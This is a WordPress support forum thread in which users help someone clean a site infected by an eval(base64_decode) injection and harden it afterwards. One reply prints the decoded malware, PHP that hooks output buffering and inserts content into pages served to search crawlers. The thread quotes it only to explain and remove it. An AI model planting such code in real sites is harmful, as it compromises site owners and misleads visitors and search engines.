eval(base64_decode HACKED

argh….I hate that! You are in for a bit of a long day…
https://codex.www.ads-software.com/FAQ_My_site_was_hacked
https://ocaoimh.ie/did-your-wordpress-site-get-hacked/
https://smackdown.blogsblogsblogs.com/2008/06/24/how-to-completely-clean-your-hacked-wordpress-installation/
https://www.snipe.net/2010/01/when-wordpress-gets-hacked/

And when you’re done:
https://codex.www.ads-software.com/Hardening_WordPress

that reading will help you out. You need to delete the gibberesh from your wp-config file. Reinstall WP (you might still be able to do it from your admin dashboard if you are lucky, if not, do a manual install). Once you have the new WP in place, delete all plugins and reinstall from clean downloads. Then reinstall your theme(s). If you have a heavily customized theme with no backup, you have to manually clean each file.

That will get your WP clean. Then change ALL passwords (wp, db, ftp)

Then you need to find out how this is happening. If you have godaddy, you have access to your server access logs. Look at the timestamp on a PHP file that was hacked. Now look at your server logs at that time/date and see how your files were accessed. Chances are, your logs will lead you to a rogue php file, or maybe more than one. Delete any files that don’t belong.

And finally, if you have any more php files on your server (besides WP) investigate them. They probably are all hacked and will need replaced or cleaned. good luck!

Thanks for the swift reply RVoodoo

I’m backing up MySQL databases now, it is a lot of work and very time consuming.

Will it be possible to recreate my site exactly like it was before or will there be noticeable differences as far as the visitor is concerned. Also, I imagine all this will require resubmitting sitemaps and such to google analytics etc.?

Will let you know how it turns out.

Thanks

you should be able to get things just the way they were. If you are lucky, your database did not get harmed. Just make sure you are very thorough. If you miss something, you may find yourself doing all this again in a week.

Also, once all is clean….keep backups of all files, and of your DB….that way in the future, if something goes south, you can just delete all the harmed stuff and use your clean copies.

so what does the above code do exactly?

here it is decoded:

if(function_exists('ob_start')&&!isset($GLOBALS['mr_no'])){ $GLOBALS['mr_no']=1; if(!function_exists('mrobh')){ if(!function_exists('gml')){ function gml(){ if (!stristr($_SERVER["HTTP_USER_AGENT"],"googlebot")&& (!stristr($_SERVER["HTTP_USER_AGENT"],"yahoo"))){ return ''; } return ""; } } if(!function_exists('gzdecode')){ function gzdecode($R5A9CF1B497502ACA23C8F611A564684C){ $R30B2AB8DC1496D06B230A71D8962AF5D=@ord(@substr($R5A9CF1B497502ACA23C8F611A564684C,3,1)); $RBE4C4D037E939226F65812885A53DAD9=10; $RA3D52E52A48936CDE0F5356BB08652F2=0; if($R30B2AB8DC1496D06B230A71D8962AF5D&4){ $R63BEDE6B19266D4EFEAD07A4D91E29EB=@unpack('v',substr($R5A9CF1B497502ACA23C8F611A564684C,10,2)); $R63BEDE6B19266D4EFEAD07A4D91E29EB=$R63BEDE6B19266D4EFEAD07A4D91E29EB[1]; $RBE4C4D037E939226F65812885A53DAD9+=2+$R63BEDE6B19266D4EFEAD07A4D91E29EB; } if($R30B2AB8DC1496D06B230A71D8962AF5D&8){ $RBE4C4D037E939226F65812885A53DAD9=@strpos($R5A9CF1B497502ACA23C8F611A564684C,chr(0),$RBE4C4D037E939226F65812885A53DAD9)+1; } if($R30B2AB8DC1496D06B230A71D8962AF5D&16){ $RBE4C4D037E939226F65812885A53DAD9=@strpos($R5A9CF1B497502ACA23C8F611A564684C,chr(0),$RBE4C4D037E939226F65812885A53DAD9)+1; } if($R30B2AB8DC1496D06B230A71D8962AF5D&2){ $RBE4C4D037E939226F65812885A53DAD9+=2; } $R034AE2AB94F99CC81B389A1822DA3353=@gzinflate(@substr($R5A9CF1B497502ACA23C8F611A564684C,$RBE4C4D037E939226F65812885A53DAD9)); if($R034AE2AB94F99CC81B389A1822DA3353===FALSE){ $R034AE2AB94F99CC81B389A1822DA3353=$R5A9CF1B497502ACA23C8F611A564684C; } return $R034AE2AB94F99CC81B389A1822DA3353; } } function mrobh($RE82EE9B121F709895EF54EBA7FA6B78B){ Header('Content-Encoding: none'); $RA179ABD3A7B9E28C369F7B59C51B81DE=gzdecode($RE82EE9B121F709895EF54EBA7FA6B78B); if(preg_match('/\<\/body/si',$RA179ABD3A7B9E28C369F7B59C51B81DE)){ return preg_replace('/(\]*\>)/si',gml()."\n".'$1',$RA179ABD3A7B9E28C369F7B59C51B81DE); }else{ return $RA179ABD3A7B9E28C369F7B59C51B81DE.gml(); } } ob_start('mrobh'); } }
Formatted version: https://wordpress.pastebin.ca/1791392

I noticed that ‘samboll’ had this in the decode

} } if(!function_exists(‘gzdecode’)){ function gzdecode($R5A9CF1B497502ACA23C8F611A564684C){

Before I posted here I thought a reinstall of 2.9.1 might help. So I did this via the Dashboard automatically. It told me the reinstall was successful, however it had a Warning.

Warning: gzuncompress() [function.gzuncompress]: data error in /home/content/81/5291081/html/wp-includes/http.php on line 1825

I guess this will be related??

it most likely related to the hack…yes.

Last time I cleaned up, I had to reinstall WP….that got things working pretty well. Then reinstalled my theme and plugins which got rid of all warnings (My dashboard still looked bad, until I did a browser refresh ctrl+f5). Then I cleaned up my wp-config, as that file doesn’t get replaced on an upgrade and still had the dirty code in it…..

After that all was well…..

Okay guys, thanks for your help so far, It looks a lot cleaner now and haven’t seen any strange behaviour but following the info here:
https://ocaoimh.ie/did-your-wordpress-site-get-hacked/

I checked my .htaccess file.

Apparantly it should be:

# BEGIN WordPress
<ifmodule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]
</ifmodule>
# END WordPress

Mine is:

rewriteengine on

# BEGIN WordPress
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]
</IfModule>

# END WordPress
rewritecond %{REQUEST_FILENAME} !-f
rewritecond %{REQUEST_FILENAME} !-d
rewriterule . /index.php [L]

Can I get rid of that rewrite stuff (with lowercase r)?

Thanks all.

I think I would delete the .htaccess entirely and then regenerate your permalinks with the same you have
admin – settings – permalinks

I did a search on <?php /**/ eval(base64_decode(“aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYhaXNzZ and found this in Google Cache. Looks like the same code:

https://74.125.95.132/search?q=cache:tL9ahEm5aqwJ:moodle.org/mod/forum/discuss.php%3Fd%3D111453+%3C%3Fphp+/**/+eval%28base64_decode%28%22aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYhaXNzZ&cd=1&hl=en&ct=clnk&gl=us

Have you tried installing the antivirus WP plugin? You can do a manual scan of your theme templates to help identify the code. If not, you can download it here: https://www.ads-software.com/extend/plugins/antivirus/

See: https://mashable.com/2009/09/05/wordpress-attack/

Hi Samuel, I saw you helped a lot of people decoding the footer.

I read lots of articles how to decode but I cant do it, would you be so kind in decoding my footer please?

And could you tell me then how you did it_

thanks

[Code moderated as per the Forum Rules. Please use the pastebin]

There are a number of ones on the web. Try this one:
https://www.tareeinternet.com/scripts/decrypt.php
or Google for: base64 decoder